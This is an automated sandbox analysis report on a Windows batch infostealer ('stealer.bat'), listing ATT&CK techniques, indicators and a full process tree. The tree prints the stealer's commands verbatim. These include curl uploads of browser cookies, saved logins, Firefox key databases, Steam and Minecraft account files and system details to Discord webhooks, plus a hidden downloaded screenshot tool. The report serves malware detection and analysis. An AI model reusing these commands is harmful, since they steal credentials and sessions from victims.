7bfd5f65d80fe137880d2f843dc5f54427e594e290724934a8a37c6a46249d2a

Analysis

max time kernel
34s
max time network
33s
platform
windows11-21h2_x64
resource
win11-20240802-en
resource tags

arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system
submitted
23/08/2024, 01:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

stealer.bat
Size

21KB
MD5

5cf892a9d8bee9cee2dbbe9cd4f544f8
SHA1

492283a598bcfe1bdc1d88b9df25cc0b7c050be9
SHA256

7bfd5f65d80fe137880d2f843dc5f54427e594e290724934a8a37c6a46249d2a
SHA512

139fb7010207280f988aac66c650fa678742f9e6ef133f4055a48849c58fd33e1e7ec9c6c2de22d13d6e283adb1d7d1be01e804fe4c18afa61a8feb8946254cb
SSDEEP

384:sUXCua64aB1T5nu9GYso11LqItMQz/QWtpBHKsthsdnXoYGjwBF10FrFRn1xZY6c:Uu7pHwIDw1LqItMQz/QWtpBHKsthsdnP

Score

9^/10

credential_access discovery evasion spyware stealer

Malware Config

Signatures

Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Blocklisted process makes network request 1 IoCs

flow	pid	Process
2	2276	powershell.exe

Sets file to hidden 1 TTPs 1 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1564.001

pid	Process
3552	attrib.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 23 IoCs

Web Service

T1102

flow	ioc
3	discord.com
23	discord.com
29	discord.com
31	discord.com
40	discord.com
51	discord.com
38	discord.com
1	discord.com
9	discord.com
17	discord.com
19	discord.com
22	discord.com
33	discord.com
35	discord.com
50	discord.com
52	discord.com
20	discord.com
34	discord.com
42	discord.com
46	discord.com
21	discord.com
44	discord.com
47	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
1	api.ipify.org

Enumerates processes with tasklist 1 TTPs 1 IoCs

discovery

Process Discovery

T1057

pid	Process
2724	tasklist.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
1876	PING.EXE
2776	cmd.exe

Delays execution with timeout.exe 12 IoCs

evasion

pid	Process
1212	timeout.exe
4004	timeout.exe
4632	timeout.exe
4948	timeout.exe
2776	timeout.exe
5028	timeout.exe
4548	timeout.exe
4556	timeout.exe
2388	timeout.exe
4800	timeout.exe
3748	timeout.exe
3228	timeout.exe

Gathers network information 2 TTPs 1 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
2240	ipconfig.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
4528	systeminfo.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
648	reg.exe

Runs net.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
1876	PING.EXE

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2276	powershell.exe
2276	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2276	powershell.exe
Token: SeDebugPrivilege	2724	tasklist.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4464 wrote to memory of 2776	4464	cmd.exe	82
PID 4464 wrote to memory of 2776	4464	cmd.exe	82
PID 2776 wrote to memory of 1876	2776	cmd.exe	83
PID 2776 wrote to memory of 1876	2776	cmd.exe	83
PID 2776 wrote to memory of 2884	2776	cmd.exe	84
PID 2776 wrote to memory of 2884	2776	cmd.exe	84
PID 4464 wrote to memory of 996	4464	cmd.exe	85
PID 4464 wrote to memory of 996	4464	cmd.exe	85
PID 996 wrote to memory of 2276	996	cmd.exe	86
PID 996 wrote to memory of 2276	996	cmd.exe	86
PID 4464 wrote to memory of 2460	4464	cmd.exe	88
PID 4464 wrote to memory of 2460	4464	cmd.exe	88
PID 4464 wrote to memory of 3156	4464	cmd.exe	89
PID 4464 wrote to memory of 3156	4464	cmd.exe	89
PID 4464 wrote to memory of 3176	4464	cmd.exe	90
PID 4464 wrote to memory of 3176	4464	cmd.exe	90
PID 4464 wrote to memory of 3552	4464	cmd.exe	91
PID 4464 wrote to memory of 3552	4464	cmd.exe	91
PID 4464 wrote to memory of 2816	4464	cmd.exe	92
PID 4464 wrote to memory of 2816	4464	cmd.exe	92
PID 4464 wrote to memory of 4528	4464	cmd.exe	93
PID 4464 wrote to memory of 4528	4464	cmd.exe	93
PID 4464 wrote to memory of 4664	4464	cmd.exe	96
PID 4464 wrote to memory of 4664	4464	cmd.exe	96
PID 4464 wrote to memory of 2724	4464	cmd.exe	97
PID 4464 wrote to memory of 2724	4464	cmd.exe	97
PID 4464 wrote to memory of 3068	4464	cmd.exe	98
PID 4464 wrote to memory of 3068	4464	cmd.exe	98
PID 4464 wrote to memory of 4432	4464	cmd.exe	99
PID 4464 wrote to memory of 4432	4464	cmd.exe	99
PID 4432 wrote to memory of 3332	4432	net.exe	100
PID 4432 wrote to memory of 3332	4432	net.exe	100
PID 4464 wrote to memory of 2236	4464	cmd.exe	101
PID 4464 wrote to memory of 2236	4464	cmd.exe	101
PID 4464 wrote to memory of 1328	4464	cmd.exe	102
PID 4464 wrote to memory of 1328	4464	cmd.exe	102
PID 4464 wrote to memory of 1232	4464	cmd.exe	103
PID 4464 wrote to memory of 1232	4464	cmd.exe	103
PID 4464 wrote to memory of 648	4464	cmd.exe	104
PID 4464 wrote to memory of 648	4464	cmd.exe	104
PID 4464 wrote to memory of 1008	4464	cmd.exe	105
PID 4464 wrote to memory of 1008	4464	cmd.exe	105
PID 4464 wrote to memory of 3140	4464	cmd.exe	106
PID 4464 wrote to memory of 3140	4464	cmd.exe	106
PID 4464 wrote to memory of 2244	4464	cmd.exe	107
PID 4464 wrote to memory of 2244	4464	cmd.exe	107
PID 4464 wrote to memory of 2240	4464	cmd.exe	108
PID 4464 wrote to memory of 2240	4464	cmd.exe	108
PID 4464 wrote to memory of 2896	4464	cmd.exe	109
PID 4464 wrote to memory of 2896	4464	cmd.exe	109
PID 4464 wrote to memory of 2912	4464	cmd.exe	110
PID 4464 wrote to memory of 2912	4464	cmd.exe	110
PID 4464 wrote to memory of 3232	4464	cmd.exe	111
PID 4464 wrote to memory of 3232	4464	cmd.exe	111
PID 4464 wrote to memory of 1688	4464	cmd.exe	112
PID 4464 wrote to memory of 1688	4464	cmd.exe	112
PID 4464 wrote to memory of 1212	4464	cmd.exe	113
PID 4464 wrote to memory of 1212	4464	cmd.exe	113
PID 4464 wrote to memory of 3000	4464	cmd.exe	114
PID 4464 wrote to memory of 3000	4464	cmd.exe	114
PID 4464 wrote to memory of 3708	4464	cmd.exe	115
PID 4464 wrote to memory of 3708	4464	cmd.exe	115
PID 4464 wrote to memory of 2280	4464	cmd.exe	116
PID 4464 wrote to memory of 2280	4464	cmd.exe	116

Views/modifies file attributes 1 TTPs 4 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
3552	attrib.exe
984	attrib.exe
3952	attrib.exe
3396	attrib.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\stealer.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:4464
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c 2>NUL ping -4 -n 1 WMCTSIEG | findstr [
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Suspicious use of WriteProcessMemory
  PID:2776
- - C:\Windows\system32\PING.EXE
    ping -4 -n 1 WMCTSIEG
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:1876
- - C:\Windows\system32\findstr.exe
    findstr [
    3⤵
    PID:2884
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell Invoke-RestMethod api.ipify.org
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:996
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Invoke-RestMethod api.ipify.org
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2276
- C:\Windows\system32\curl.exe
  curl --silent --output /dev/null -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"```[Report from Admin - 194.110.13.70]\nLocal time: 1:03```\"}" https://discord.com/api/webhooks/
  2⤵
  PID:2460
- C:\Windows\system32\curl.exe
  curl --silent --output /dev/null -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"```Screenshot @ 1:03```\"}" https://discord.com/api/webhooks/
  2⤵
  PID:3156
- C:\Windows\system32\curl.exe
  curl --silent -L --fail "https://github.com/chuntaro/screenshot-cmd/blob/master/screenshot.exe?raw=true" -o s.exe
  2⤵
  PID:3176
- C:\Windows\system32\attrib.exe
  attrib "C:\ProgramData\s.exe" +h
  2⤵
  - Sets file to hidden
  - Views/modifies file attributes
  PID:3552
- C:\Windows\system32\curl.exe
  curl --silent --output /dev/null -F ss=@"C:\ProgramData\s.png" https://discord.com/api/webhooks/
  2⤵
  PID:2816
- C:\Windows\system32\systeminfo.exe
  SystemInfo
  2⤵
  - Gathers system information
  PID:4528
- C:\Windows\system32\curl.exe
  curl --silent --output /dev/null -F systeminfo=@"C:\Users\Admin\AppData\Roaming\sysinfo.txt" https://discord.com/api/webhooks/
  2⤵
  PID:4664
- C:\Windows\system32\tasklist.exe
  tasklist
  2⤵
  - Enumerates processes with tasklist
  - Suspicious use of AdjustPrivilegeToken
  PID:2724
- C:\Windows\system32\curl.exe
  curl --silent --output /dev/null -F tasks=@"C:\Users\Admin\AppData\Roaming\tasklist.txt" https://discord.com/api/webhooks/
  2⤵
  PID:3068
- C:\Windows\system32\net.exe
  net user
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4432
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user
    3⤵
    PID:3332
- C:\Windows\system32\curl.exe
  curl --silent --output /dev/null -F tasks=@"C:\Users\Admin\AppData\Roaming\netuser.txt" https://discord.com/api/webhooks/
  2⤵
  PID:2236
- C:\Windows\system32\quser.exe
  quser
  2⤵
  PID:1328
- C:\Windows\system32\curl.exe
  curl --silent --output /dev/null -F tasks=@"C:\Users\Admin\AppData\Roaming\quser.txt" https://discord.com/api/webhooks/
  2⤵
  PID:1232
- C:\Windows\system32\reg.exe
  reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
  2⤵
  - Modifies registry key
  PID:648
- C:\Windows\system32\curl.exe
  curl --silent --output /dev/null -F tasks=@"C:\Users\Admin\AppData\Roaming\stup.txt" https://discord.com/api/webhooks/
  2⤵
  PID:1008
- C:\Windows\system32\cmdkey.exe
  cmdkey /list
  2⤵
  PID:3140
- C:\Windows\system32\curl.exe
  curl --silent --output /dev/null -F tasks=@"C:\Users\Admin\AppData\Roaming\cmdkey.txt" https://discord.com/api/webhooks/
  2⤵
  PID:2244
- C:\Windows\system32\ipconfig.exe
  ipconfig /all
  2⤵
  - Gathers network information
  PID:2240
- C:\Windows\system32\curl.exe
  curl --silent --output /dev/null -F tasks=@"C:\Users\Admin\AppData\Roaming\ipconfig.txt" https://discord.com/api/webhooks/
  2⤵
  PID:2896
- C:\Windows\system32\curl.exe
  curl --silent --output /dev/null -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"```- CHROME -```\"}" https://discord.com/api/webhooks/
  2⤵
  PID:2912
- C:\Windows\system32\curl.exe
  curl --silent --output /dev/null -F c=@"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cookies" https://discord.com/api/webhooks/
  2⤵
  PID:3232
- C:\Windows\system32\curl.exe
  curl --silent --output /dev/null -F h=@"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\History" https://discord.com/api/webhooks/
  2⤵
  PID:1688
- C:\Windows\system32\timeout.exe
  timeout /t 2 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:1212
- C:\Windows\system32\curl.exe
  curl --silent --output /dev/null -F s=@"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Shortcuts" https://discord.com/api/webhooks/
  2⤵
  PID:3000
- C:\Windows\system32\curl.exe
  curl --silent --output /dev/null -F b=@"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Bookmarks" https://discord.com/api/webhooks/
  2⤵
  PID:3708
- C:\Windows\system32\curl.exe
  curl --silent --output /dev/null -F l=@"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Login Data" https://discord.com/api/webhooks/
  2⤵
  PID:2280
- C:\Windows\system32\timeout.exe
  timeout /t 2 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:4548
- C:\Windows\system32\curl.exe
  curl --silent --output /dev/null -F l=@"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State" https://discord.com/api/webhooks/
  2⤵
  PID:1040
- C:\Windows\system32\timeout.exe
  timeout /t 2 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:4556
- C:\Windows\system32\curl.exe
  curl --silent --output /dev/null -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"```- OPERA -```\"}" https://discord.com/api/webhooks/
  2⤵
  PID:332
- C:\Windows\system32\curl.exe
  curl --silent --output /dev/null -F c=@"C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Cookies" https://discord.com/api/webhooks/
  2⤵
  PID:4608
- C:\Windows\system32\curl.exe
  curl --silent --output /dev/null -F h=@"C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\History" https://discord.com/api/webhooks/
  2⤵
  PID:4264
- C:\Windows\system32\timeout.exe
  timeout /t 2 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:2388
- C:\Windows\system32\curl.exe
  curl --silent --output /dev/null -F s=@"C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Shortcuts" https://discord.com/api/webhooks/
  2⤵
  PID:4728
- C:\Windows\system32\curl.exe
  curl --silent --output /dev/null -F b=@"C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Bookmarks" https://discord.com/api/webhooks/
  2⤵
  PID:4552
- C:\Windows\system32\curl.exe
  curl --silent --output /dev/null -F l=@"C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Login Data" https://discord.com/api/webhooks/
  2⤵
  PID:1760
- C:\Windows\system32\timeout.exe
  timeout /t 2 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:4004
- C:\Windows\system32\curl.exe
  curl --silent --output /dev/null -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"```- VIVALDI -```\"}" https://discord.com/api/webhooks/
  2⤵
  PID:4688
- C:\Windows\system32\curl.exe
  curl --silent --output /dev/null -F c=@"C:\Users\Admin\AppData\Local\Vivaldi\User Data\Default\Cookies" https://discord.com/api/webhooks/
  2⤵
  PID:908
- C:\Windows\system32\curl.exe
  curl --silent --output /dev/null -F h=@"C:\Users\Admin\AppData\Local\Vivaldi\User Data\Default\History" https://discord.com/api/webhooks/
  2⤵
  PID:4840
- C:\Windows\system32\timeout.exe
  timeout /t 2 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:4800
- C:\Windows\system32\curl.exe
  curl --silent --output /dev/null -F s=@"C:\Users\Admin\AppData\Local\Vivaldi\User Data\Default\Shortcuts" https://discord.com/api/webhooks/
  2⤵
  PID:3808
- C:\Windows\system32\curl.exe
  curl --silent --output /dev/null -F b=@"C:\Users\Admin\AppData\Local\Vivaldi\User Data\Default\Bookmarks" https://discord.com/api/webhooks/
  2⤵
  PID:1500
- C:\Windows\system32\curl.exe
  curl --silent --output /dev/null -F l=@"C:\Users\Admin\AppData\Local\Vivaldi\User Data\Default\Login Data" https://discord.com/api/webhooks/
  2⤵
  PID:3600
- C:\Windows\system32\timeout.exe
  timeout /t 2 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:3748
- C:\Windows\system32\curl.exe
  curl --silent --output /dev/null -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"```- FIREFOX -```\"}" https://discord.com/api/webhooks/
  2⤵
  PID:1724
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c 2>NUL dir /b "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles"
  2⤵
  PID:2968
- C:\Windows\system32\curl.exe
  curl --silent --output /dev/null -F level=@"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\uz50bozt.Admin\logins.json" https://discord.com/api/webhooks/
  2⤵
  PID:1584
- C:\Windows\system32\timeout.exe
  timeout /t 2 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:4632
- C:\Windows\system32\curl.exe
  curl --silent --output /dev/null -F level=@"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\uz50bozt.Admin\key3.db" https://discord.com/api/webhooks/
  2⤵
  PID:4640
- C:\Windows\system32\curl.exe
  curl --silent --output /dev/null -F level=@"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\uz50bozt.Admin\key4.db" https://discord.com/api/webhooks/
  2⤵
  PID:3384
- C:\Windows\system32\curl.exe
  curl --silent --output /dev/null -F level=@"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\uz50bozt.Admin\cookies.sqlite" https://discord.com/api/webhooks/
  2⤵
  PID:2480
- C:\Windows\system32\timeout.exe
  timeout /t 2 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:3228
- C:\Windows\system32\curl.exe
  curl --silent --output /dev/null -F level=@"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ybdgtqfi.default-release\logins.json" https://discord.com/api/webhooks/
  2⤵
  PID:4564
- C:\Windows\system32\timeout.exe
  timeout /t 2 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:2776
- C:\Windows\system32\curl.exe
  curl --silent --output /dev/null -F level=@"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ybdgtqfi.default-release\key3.db" https://discord.com/api/webhooks/
  2⤵
  PID:3492
- C:\Windows\system32\curl.exe
  curl --silent --output /dev/null -F level=@"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ybdgtqfi.default-release\key4.db" https://discord.com/api/webhooks/
  2⤵
  PID:3584
- C:\Windows\system32\curl.exe
  curl --silent --output /dev/null -F level=@"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ybdgtqfi.default-release\cookies.sqlite" https://discord.com/api/webhooks/
  2⤵
  PID:3728
- C:\Windows\system32\timeout.exe
  timeout /t 2 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:5028
- C:\Windows\system32\curl.exe
  curl --silent --output /dev/null -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"```- DISCORD -```\"}" https://discord.com/api/webhooks/
  2⤵
  PID:4268
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c 2>NUL dir /b "C:\Users\Admin\AppData\Roaming\discord\Local Storage\leveldb\"
  2⤵
  PID:3128
- C:\Windows\system32\curl.exe
  curl --silent --output /dev/null -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"```- STEAM -```\"}" https://discord.com/api/webhooks/
  2⤵
  PID:4364
- C:\Windows\system32\curl.exe
  curl --silent --output /dev/null -F steamusers=@"C:\Program Files (x86)\Steam\config\loginusers.vdf" https://discord.com/api/webhooks/
  2⤵
  PID:3820
- C:\Windows\system32\curl.exe
  curl --silent --output /dev/null -F loginusers=@"C:\Program Files\Steam\config\loginusers.vdf" https://discord.com/api/webhooks/
  2⤵
  PID:1448
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c 2>NUL dir /b "C:\Program Files (x86)\Steam\"
  2⤵
  PID:996
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c 2>NUL dir /b "C:\Program Files\Steam\"
  2⤵
  PID:72
- C:\Windows\system32\curl.exe
  curl --silent --output /dev/null -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"```- MINECRAFT -```\"}" https://discord.com/api/webhooks/
  2⤵
  PID:1552
- C:\Windows\system32\curl.exe
  curl --silent --output /dev/null -F steamusers=@"C:\Users\Admin\AppData\Roaming\.minecraft\launcher_profiles.json" https://discord.com/api/webhooks/
  2⤵
  PID:1596
- C:\Windows\system32\curl.exe
  curl --silent --output /dev/null -F steamusers=@"C:\Users\Admin\AppData\Roaming\.minecraft\launcher_accounts.json" https://discord.com/api/webhooks/
  2⤵
  PID:240
- C:\Windows\system32\timeout.exe
  timeout /t 2 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:4948
- C:\Windows\system32\attrib.exe
  attrib -h "C:\ProgramData\"
  2⤵
  - Views/modifies file attributes
  PID:984
- C:\Windows\system32\attrib.exe
  attrib -h "C:\ProgramData\"
  2⤵
  - Views/modifies file attributes
  PID:3952
- C:\Windows\system32\attrib.exe
  attrib -h "C:\ProgramData\"
  2⤵
  - Views/modifies file attributes
  PID:3396

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

Remote System Discovery

T1018

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\s.exe

Filesize
124KB

MD5
7e5f7310ce0fee6802692a69eec4ab2b

SHA1
8490b94fd0bf86cb03b87c5047d22cb8eb1dda34

SHA256
e7693cdf1ac17f83d428d8d7da4bd6209bc807626e6114de69b9f2012fa24244

SHA512
b066ae0592e17be70310504a44559ae1db31a768ee364665315409be02125345db85e42628433c92d0967905295f7d303f04d82c779528fe9cbbde8f40eeaee1

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cc1le5r3.tq3.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\cmdkey.txt

Filesize
309B

MD5
7bfb234fd81e1480557b65bce29dd7a1

SHA1
39f85343f68ba8c8a50a7434e8ac21bdf3c57f86

SHA256
6a7a644270f6f563bbeddbbdb17bb23ac93417afcd927c0f14de61342d3b8f1f

SHA512
1d759e7fa1da8f6733af15a1ec914ab77946e80b12f335a2c9327606c5e2078a3d44e4b5c5015850cce741c31b2cbf43ea835ca0a6d517fe093bd40180ed49f0

Download Submit
C:\Users\Admin\AppData\Roaming\ipconfig.txt

Filesize
1022B

MD5
9ac725e35110447a1ca43eea66a02ce7

SHA1
65b65eb7987fa035782d640695c30eb28e61b74b

SHA256
f90638e659f73791978c08140d9ac6b661bb5e50f2b9218cfa8de7ba16969235

SHA512
fa0f23de40b3954b42e35a7cbd5512e33d660622d3a64e529fac6db6279e3be7b6bed648dc63fa00efbbf8b208c6422264476c83d04eaa051838543beeafb759

Download Submit
C:\Users\Admin\AppData\Roaming\netuser.txt

Filesize
283B

MD5
81222334bec7b05697c3d15318fb287d

SHA1
8940fd597a766f1959fdb83008fb5653af2d0bd0

SHA256
25cadb5bfacaa4817d4054987645fdab6cbf09e57f79d65aed3e0a754dcd25a9

SHA512
67ac1fad5d6aa0a979825f774fcea11f218fdaae66ae2ec3e6f30cae2c7d7ded902c6c4a13a635c50329c9050efb0c7fb5ff46f904858705223d7b923b4ed55f

Download Submit
C:\Users\Admin\AppData\Roaming\quser.txt

Filesize
160B

MD5
f43b931c56ef7955ef1dd288a7880406

SHA1
708a3f9b97afc0bbbc457fff5ced2f704cf37dc7

SHA256
198b33ddfe906f4db9be8f3e28b29b9059ed72ac0ea9f50cb417b06696397199

SHA512
27624d717c6b314441d1ada80f45139045c179344b7fa0850574fb09dfaf84d3097a66a6fafce75eb23672e18faf89b25786a4761e90824cda0ddb0de5a0b1ba

Download Submit
C:\Users\Admin\AppData\Roaming\stup.txt

Filesize
2B

MD5
81051bcc2cf1bedf378224b0a93e2877

SHA1
ba8ab5a0280b953aa97435ff8946cbcbb2755a27

SHA256
7eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6

SHA512
1b302a2f1e624a5fb5ad94ddc4e5f8bfd74d26fa37512d0e5face303d8c40eee0d0ffa3649f5da43f439914d128166cb6c4774a7caa3b174d7535451eb697b5d

Download Submit
C:\Users\Admin\AppData\Roaming\sysinfo.txt

Filesize
2KB

MD5
11311d64d7b3a2b9a033b71ce6ea48b4

SHA1
9100e7f3322ffd575e9b705760dea126395b5e60

SHA256
4ad00803a5d9389002288546fbd35c88265e5e8024dea261b95181fc9d4ec182

SHA512
6cfcb9c75f7868725d9d3a94557d56ff8579451a0505412b5df4ff0173c7fe3977de2904f0e1a4cba0fe685715883068cf16efacfc517699b9d289b229abfa02

Download Submit
C:\Users\Admin\AppData\Roaming\tasklist.txt

Filesize
6KB

MD5
63accd1c687bdcdb65ec19f02ec1fd9c

SHA1
3c9e4a0887c2e500757c387190a1214fd72d5233

SHA256
baf8605065ccef600692b966ad848d8eec20971e8cc3c3ef44c4d4cb4fb482d6

SHA512
e086522a4faa5b7ec49ce584f050b55fb23c7e5ac34b1971c7df4a46a7d07d3f2dea8f78c9444ed55701bd47b091b70bb387bde39b2e597037e89fa7749b936f

Download Submit
memory/2276-13-0x000002E928FE0000-0x000002E9291A2000-memory.dmp

Filesize
1.8MB

Download
memory/2276-16-0x00007FFB7D870000-0x00007FFB7E332000-memory.dmp

Filesize
10.8MB

Download
memory/2276-12-0x00007FFB7D870000-0x00007FFB7E332000-memory.dmp

Filesize
10.8MB

Download
memory/2276-11-0x00007FFB7D870000-0x00007FFB7E332000-memory.dmp

Filesize
10.8MB

Download
memory/2276-0-0x00007FFB7D873000-0x00007FFB7D875000-memory.dmp

Filesize
8KB

Download
memory/2276-10-0x00007FFB7D870000-0x00007FFB7E332000-memory.dmp

Filesize
10.8MB

Download
memory/2276-9-0x000002E928960000-0x000002E928982000-memory.dmp

Filesize
136KB

Download